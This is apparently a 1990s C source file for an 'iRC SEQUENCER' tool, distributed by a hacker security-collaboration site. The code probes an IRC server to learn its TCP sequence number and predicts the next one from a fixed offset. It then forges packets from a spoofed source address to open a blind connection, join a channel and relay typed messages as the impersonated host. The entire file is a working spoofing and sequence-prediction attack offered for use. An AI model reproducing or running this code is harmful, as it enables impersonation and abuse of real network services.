..:-={{Collaborative Security Information Center}}=-:..
    X-TREME & TECHNOTRONIC Security Collaboration Project
http://www.technotronic.com  -=(c)=-  http://www.x-treme.abyss.com


/*								*/
/* iRC SEQUENCER v0.0001 = MUTUALLY DEVELOPED BY Z AND VECT0R-X */
/* Under Solaris try:						*/
/*	gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb		*/

#include "tcpip.c"

unsigned long sourceport   = 23;
unsigned long dest, spoofed, src, nseq, tarport, temp;
char *nickn, *userid, *channel, *ircname, *current;
char str[255], *string;
char buf[4096];
int len, rec, sen, i=1, adder=128000, stringlen=0;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

void main(int argc, char *argv[])
{
	unsigned long fakesequence = 408618+getpid();

	system("clear");
	printf("iRC SEQUENCE - Writtin by z and vect0rx.\n\n");

	if (argc != 9) {
		fprintf(stderr,"Usage: %s <server> <port> <nick> <userid> <spoof> <ircname> <channel> {1|2}\n\n",argv[0]);
		fprintf(stderr,"		<server> - Site spoof is attempted on.\n");
		fprintf(stderr,"		  <port> - Port to access on <server>.\n");
		fprintf(stderr,"		  <nick> - Nickname for spoof to user.\n");
		fprintf(stderr,"		<userid> - Account name of spoof.\n");
		fprintf(stderr,"		 <spoof> - Host to appear from.\n");
		fprintf(stderr,"	       <ircname> - Default is (*Unknown*).\n");
		fprintf(stderr,"	(w/o #)<channel> - Initial channel (0 for none).\n");
		fprintf(stderr,"	               1 - Offset of 128000 (common).\n");
		fprintf(stderr,"	               2 - Offset of 64000 (not likely).\n\n");
		exit(1);
	}
	tarport = atoi(argv[2]);
	nickn = argv[3];
	userid = argv[4];
	ircname = argv[6];
	channel = argv[7];		
        if (argv[8][0] == '2') adder=64000;

	memset(&spoofedaddr,0,sizeof(spoofedaddr));
	spoofedaddr.sin_family = AF_INET;
	if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[5])) == -1) {
		if ((host = gethostbyname(argv[5])) == NULL) {
			printf("Unknown host %s.\n",argv[5]);
			exit(1);
		}
		spoofedaddr.sin_family = host->h_addrtype;
		memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length);
	}
	memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4);

	memset(&addr,0,sizeof(addr));
	addr.sin_family = AF_INET;
	if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
		if ((host = gethostbyname(argv[1])) == NULL) {
			printf("Unknown host %s.\n",argv[1]);
			exit(1);
		}
		addr.sin_family = host->h_addrtype;
		memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);
	}
	memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);

	if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
		perror("error: recv socket");
		exit(1);
	}

	if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("error: send socket");
		exit(1);
	}

/*	
	sen = openintf("ppp0");
*/	 


	gethostname(buf, 128);
	if ((host=gethostbyname(buf))==NULL) {
		fprintf(stderr, "Can't get my hostname!?\n");
		exit(1);
	}
	memcpy(&src,host->h_addr,4);


        sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport,
			tarport, fakesequence, 0, NULL, 0);

	for (;;) {
	    gettcppacket(rec,buf,sizeof(buf));
	    ip = (struct iphdr *) buf;
	    if (ip->saddr != dest) continue;
	    len = ip->ihl << 2;
	    tcp = (struct tcphdr *) (buf+len);
            if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) {
                    temp=htonl(tcp->th_seq);
		    nseq=temp; 
		    nseq+=adder;
		    printf("Sequence returned is %lu, Offset is %lu\n",
				nseq, adder);
		    sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport,
					tarport, fakesequence, 0, NULL, 0);
                    break; /* out of for loop */
            }
	}
	
	printf("%s!%s@%s on server %s:%d on channel %s\n",
			nickn, userid, argv[5], argv[1], tarport, channel);

        
	sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport,
			tarport,fakesequence,0,NULL,0);
        printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout);
	usleep(10000);
    	
	sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport,
			tarport,++fakesequence,++nseq,NULL,0);
        printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout);
        usleep(5000);

        printf("Sending irc client handshake for %s.\n", nickn); fflush(stdout);
	sprintf(str,"USER %s # # :%s\r\nNICK %s\r\nJOIN #%s\r\n", 
	userid, ircname, nickn, channel);
    	stringlen = strlen(str);
	sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
			tarport,fakesequence,nseq,str,stringlen);
        fakesequence+=stringlen;

	current = channel;

	for(;;) {
  	    printf("vczseq:#%s> ", current); fflush(stdout);
  	    string = fgets(str, 255, stdin); 
  	    stringlen = strlen(string);
  	  
	    sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
			tarport,fakesequence,nseq,string,stringlen);
	    fakesequence+=stringlen;
	}

}
/*
*/